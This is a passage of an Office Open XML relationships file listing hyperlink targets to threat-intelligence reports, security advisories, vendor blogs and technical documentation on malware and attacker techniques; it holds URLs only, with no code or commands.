TargetMode="External"/><Relationship Id="rId2731" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.us-cert.gov/ncas/alerts/TA18-086A" TargetMode="External"/><Relationship Id="rId2829" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf" TargetMode="External"/><Relationship Id="rId703" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/" TargetMode="External"/><Relationship Id="rId910" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html" TargetMode="External"/><Relationship Id="rId1333" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf" TargetMode="External"/><Relationship Id="rId1540" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists" TargetMode="External"/><Relationship Id="rId1638" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/library/ee617241.aspx" TargetMode="External"/><Relationship Id="rId1400" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf" TargetMode="External"/><Relationship Id="rId1845" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.osdfcon.org/presentations/2020/Brian-Moran_Putting-Together-the-RDPieces.pdf" TargetMode="External"/><Relationship Id="rId3060" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sentinelone.com/blog/coming-out-of-your-shell-from-shlayer-to-zshlayer/" TargetMode="External"/><Relationship Id="rId1705" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790" TargetMode="External"/><Relationship Id="rId1912" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us.norton.com/internetsecurity-malware-what-is-a-botnet.html" TargetMode="External"/><Relationship Id="rId286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-cert.cisa.gov/ncas/alerts/aa20-258a" TargetMode="External"/><Relationship Id="rId493" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cyberscoop.com/babuk-ransomware-serco-attack/" TargetMode="External"/><Relationship Id="rId2174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200125132645/https:/www.sans.org/security-resources/malwarefaq/conficker-worm" TargetMode="External"/><Relationship Id="rId2381" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html" TargetMode="External"/><Relationship Id="rId3018" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a" TargetMode="External"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html" TargetMode="External"/><Relationship Id="rId353" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.talosintelligence.com/2017/03/dnsmessenger.html" TargetMode="External"/><Relationship Id="rId560" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.justice.gov/opa/pr/two-chinese-hackers-associated-ministry-state-security-charged-global-computer-intrusion" TargetMode="External"/><Relationship Id="rId798" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre" TargetMode="External"/><Relationship Id="rId1190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.joesandbox.com/analysis/318027/0/html" TargetMode="External"/><Relationship Id="rId2034" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.powershellmagazine.com/2014/07/08/powersploit/" TargetMode="External"/><Relationship Id="rId2241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/el-machete/66108/" TargetMode="External"/><Relationship Id="rId2479" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html" TargetMode="External"/><Relationship Id="rId2686" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-curious-case-of-the-malicious-iis-module/" TargetMode="External"/><Relationship Id="rId2893" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html" TargetMode="External"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.slideshare.net/DouglasBienstock/shmoocon-2019-becs-and-beyond-investigating-and-defending-office-365" TargetMode="External"/><Relationship Id="rId420" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cofense.com/upgrades-delivery-support-infrastructure-revenge-rat-malware-bigger-threat/" TargetMode="External"/><Relationship Id="rId658" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.ensilo.com/atombombing-brand-new-code-injection-for-windows" TargetMode="External"/><Relationship Id="rId865" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html" TargetMode="External"/><Relationship Id="rId1050" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/gtworek/PSBits/tree/master/NoRunDll" TargetMode="External"/><Relationship Id="rId1288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/" TargetMode="External"/><Relationship Id="rId1495" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/threatpunter/detecting-lateral-movement-using-sysmon-and-splunk-318d3be141bc" TargetMode="External"/><Relationship Id="rId2101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response" TargetMode="External"/><Relationship Id="rId2339" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/" TargetMode="External"/><Relationship Id="rId2546" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/cc732713.aspx" TargetMode="External"/><Relationship Id="rId2753" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2018/10/unit42-new-techniques-uncover-attribute-cobalt-gang-commodity-builders-infrastructure-revealed/" TargetMode="External"/><Relationship Id="rId2960" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisa.gov/uscert/ncas/alerts/aa22-057a" TargetMode="External"/><Relationship Id="rId518" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cybereason.com/blog/valak-more-than-meets-the-eye" TargetMode="External"/><Relationship Id="rId725" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/wp-content/uploads/2018/08/Eset-Turla-Outlook-Backdoor.pdf" TargetMode="External"/><Relationship Id="rId932" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.forcepoint.com/blog/x-labs/bitter-targeted-attack-against-pakistan" TargetMode="External"/><Relationship Id="rId1148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureauth.com/labs/open-source-tools/impacket" TargetMode="External"/><Relationship Id="rId1355" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mdsec.co.uk/2020/06/detecting-and-advancing-in-memory-net-tradecraft/" TargetMode="External"/><Relationship Id="rId1562" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloudblogs.microsoft.com/microsoftsecure/2016/03/22/new-feature-in-office-2016-can-block-macros-and-help-prevent-infection/" TargetMode="External"/><Relationship Id="rId2406" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/connect/blogs/life-mars-how-attackers-took-advantage-hope-alien-existance-new-darkmoon-campaign" TargetMode="External"/><Relationship Id="rId2613" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html" TargetMode="External"/><Relationship Id="rId1008" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/gremwell/o365enum" TargetMode="External"/><Relationship Id="rId1215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/the-banking-trojan-emotet-detailed-analysis/69560/" TargetMode="External"/><Relationship Id="rId1422" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/" TargetMode="External"/><Relationship Id="rId1867" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ncsc.gov.uk/report/joint-report-on-publicly-available-hacking-tools" TargetMode="External"/><Relationship Id="rId2820" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20051013084246/http:/www.trilithium.com/johan/2005/08/linux-gate/" TargetMode="External"/><Relationship Id="rId2918" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://xorrior.com/persistent-credential-theft/" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html" TargetMode="External"/><Relationship Id="rId1727" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer" TargetMode="External"/><Relationship Id="rId1934" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.owasp.org/index.php/OAT-004_Fingerprinting" TargetMode="External"/><Relationship Id="rId3082" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20150923175837/http:/www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&amp;tabid=2" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://adsecurity.org/?p=2716" TargetMode="External"/><Relationship Id="rId2196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pen-testing.sans.org/resources/papers/gcih/real-world-arp-spoofing-105411" TargetMode="External"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/" TargetMode="External"/><Relationship Id="rId375" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2022/07/transparent-tribe-targets-education.html" TargetMode="External"/><Relationship Id="rId582" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.deepinstinct.com/2019/04/02/new-servhelper-variant-employs-excel-4-0-macro-to-drop-signed-payload/" TargetMode="External"/><Relationship Id="rId2056" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks" TargetMode="External"/><Relationship Id="rId2263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/blog/cobalt-dickens-goes-back-to-school-again" TargetMode="External"/><Relationship Id="rId2470" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.trustedcomputinggroup.org/wp-content/uploads/Trusted-Platform-Module-Summary_04292008.pdf" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.360totalsecurity.com/en/apt-c-43-steals-venezuelan-military-secrets-to-provide-intelligence-support-for-the-reactionaries-hpreact-campaign/" TargetMode="External"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf" TargetMode="External"/><Relationship Id="rId442" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/" TargetMode="External"/><Relationship Id="rId887" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html" TargetMode="External"/><Relationship Id="rId1072" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.google.com/storage" TargetMode="External"/><Relationship Id="rId2123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redcanary.com/blog/cor_profiler-for-persistence/" TargetMode="External"/><Relationship Id="rId2330" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mci.gov.sg/-/media/mcicorp/doc/report-of-the-coi-into-the-cyber-attack-on-singhealth-10-jan-2019.ashx" TargetMode="External"/><Relationship Id="rId2568" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tetradefense.com/incident-response-services/cause-and-effect-sodinokibi-ransomware-analysis" TargetMode="External"/><Relationship Id="rId2775" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/" TargetMode="External"/><Relationship Id="rId2982" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/" TargetMode="External"/><Relationship Id="rId302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cadosecurity.com/cado-discovers-denonia-the-first-malware-specifically-targeting-lambda/" TargetMode="External"/><Relationship Id="rId747" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.itprotoday.com/windows-78/eldos-provides-raw-disk-access-vista-and-xp" TargetMode="External"/><Relationship Id="rId954" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.gdatasoftware.com/blog/2019/06/31724-strange-bits-sodinokibi-spam-cinarat-and-fake-g-data" TargetMode="External"/><Relationship Id="rId1377" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office" TargetMode="External"/><Relationship Id="rId1584" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh994565(v=ws.11)" TargetMode="External"/><Relationship Id="rId1791" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/windows/desktop/bb968806.aspx" TargetMode="External"/><Relationship Id="rId2428" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://symantec-enterprise-blogs.security.com/sites/default/files/2018-04/Orangeworm%20IOCs.pdf" TargetMode="External"/><Relationship Id="rId2635" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.trendmicro.com/trendlabs-security-intelligence/autoit-compiled-worm-affecting-removable-media-delivers-fileless-version-of-bladabindi-njrat-backdoor/" TargetMode="External"/><Relationship Id="rId2842" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf" TargetMode="External"/><Relationship Id="rId607" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.didierstevens.com/2017/11/13/webdav-traffic-to-malicious-sites/" TargetMode="External"/><Relationship Id="rId814" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf" TargetMode="External"/><Relationship Id="rId1237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/08/07172148/ShadowPad_technical_description_PDF.pdf" TargetMode="External"/><Relationship Id="rId1444" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-technique" TargetMode="External"/><Relationship Id="rId1651" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview" TargetMode="External"/><Relationship Id="rId1889" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2017-0176" TargetMode="External"/><Relationship Id="rId2702" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.stigviewer.com/stig/windows_server_2008_r2_member_server/2015-06-25/finding/V-26482" TargetMode="External"/><Relationship Id="rId1304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/" TargetMode="External"/><Relationship Id="rId1511" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://community.softwaregrp.com/t5/Security-Research/9002-RAT-a-second-building-on-the-left/ba-p/228686" TargetMode="External"/><Relationship Id="rId1749" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://download.microsoft.com/download/4/4/C/44CDEF0E-7924-4787-A56A-16261691ACE3/Microsoft_Security_Intelligence_Report_Volume_19_English.pdf" TargetMode="External"/><Relationship Id="rId1956" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://enterprise-manage.norman.c.bitbit.net/resources/files/Unveiling_an_Indian_Cyberattack_Infrastructure.pdf" TargetMode="External"/><Relationship Id="rId1609" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.office.com/article/enable-or-disable-macros-in-office-files-12b036fd-d140-4e74-b45e-16fed1a7e5c6" TargetMode="External"/><Relationship Id="rId1816" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/windows/desktop/ms633574.aspx" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://o365blog.com/post/on-prem_admin/" TargetMode="External"/><Relationship Id="rId397" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf" TargetMode="External"/><Relationship Id="rId2078" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pylos.co/2019/04/12/a-xenotime-to-remember-veles-in-the-wild/" TargetMode="External"/><Relationship Id="rId2285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector" TargetMode="External"/><Relationship Id="rId2492" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2021/02/obliquerat-new-campaign.html" TargetMode="External"/><Relationship Id="rId3031" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://isc.sans.edu/forums/diary/new+rogueDHCP+server+malware/6025/" TargetMode="External"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://security.web.cern.ch/advisories/windigo/windigo.shtml" TargetMode="External"/><Relationship Id="rId464" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/wizard-spider-lunar-spider-shared-proxy-module/" TargetMode="External"/><Relationship Id="rId1094" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://groupib.pathfactory.com/ransomware-reports/prolock_wp" TargetMode="External"/><Relationship Id="rId2145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.reuters.com/article/us-taiwan-cyber-china/taiwan-says-china-behind-cyberattacks-on-government-agencies-emails-idUSKCN25F0JK" TargetMode="External"/><Relationship Id="rId2797" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/" TargetMode="External"/><Relationship Id="rId117" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang" TargetMode="External"/><Relationship Id="rId671" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2022/01/25/watering-hole-deploys-new-macos-malware-dazzlespy-asia/" TargetMode="External"/><Relationship Id="rId769" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/powershell/module/exchange/?view=exchange-ps" TargetMode="External"/><Relationship Id="rId976" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://geminiadvisory.io/fin7-ransomware-bastion-secure/" TargetMode="External"/><Relationship Id="rId1399" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a" TargetMode="External"/><Relationship Id="rId2352" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/" TargetMode="External"/><Relationship Id="rId2657" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://documents.trendmicro.com/assets/white_papers/wp-pawn-storm-in-2019.pdf" TargetMode="External"/><Relationship Id="rId324" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/" TargetMode="External"/><Relationship Id="rId531" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://threatvector.cylance.com/en_us/home/el-machete-malware-attacks-cut-through-latam.html" TargetMode="External"/><Relationship Id="rId629" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.docker.com/engine/reference/commandline/images/" TargetMode="External"/><Relationship Id="rId1161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html" TargetMode="External"/><Relationship Id="rId1259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/documentation/security/keychain_services/keychain_items" TargetMode="External"/><Relationship Id="rId1466" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/" TargetMode="External"/><Relationship Id="rId2005" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/" TargetMode="External"/><Relationship Id="rId2212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/" TargetMode="External"/><Relationship Id="rId2864" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Code_signing" TargetMode="External"/><Relationship Id="rId836" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html" TargetMode="External"/><Relationship Id="rId1021" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/f0rb1dd3n/Reptile" TargetMode="External"/><Relationship Id="rId1119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hexacorn.com/blog/2014/04/16/beyond-good-ol-run-key-part-10/" TargetMode="External"/><Relationship Id="rId1673" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-shllink/c41e062d-f764-4f13-bd4f-ea812ab9a4d1" TargetMode="External"/><Relationship Id="rId1880" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm" TargetMode="External"/><Relationship Id="rId1978" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html" TargetMode="External"/><Relationship Id="rId2517" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/sysinternals/bb963902" TargetMode="External"/><Relationship Id="rId2724" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.us-cert.gov/ncas/analysis-reports/AR18-221A" TargetMode="External"/><Relationship Id="rId2931" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.zscaler.com/blogs/research/spear-phishing-campaign-delivers-buer-and-bazar-malware" TargetMode="External"/><Relationship Id="rId903" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html" TargetMode="External"/><Relationship Id="rId1326" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf" TargetMode="External"/><Relationship Id="rId1533" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloudblogs.microsoft.com/microsoftsecure/2015/06/09/windows-10-to-offer-application-developers-new-malware-defenses/?source=mmpc" TargetMode="External"/><Relationship Id="rId1740" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/aa376977" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.88_ENG.pdf" TargetMode="External"/><Relationship Id="rId1600" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/" TargetMode="External"/><Relationship Id="rId1838" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules" TargetMode="External"/><Relationship Id="rId3053" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://datatracker.ietf.org/doc/html/rfc3315" TargetMode="External"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.xpnsec.com/azuread-connect-for-redteam/" TargetMode="External"/><Relationship Id="rId1905" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/" TargetMode="External"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 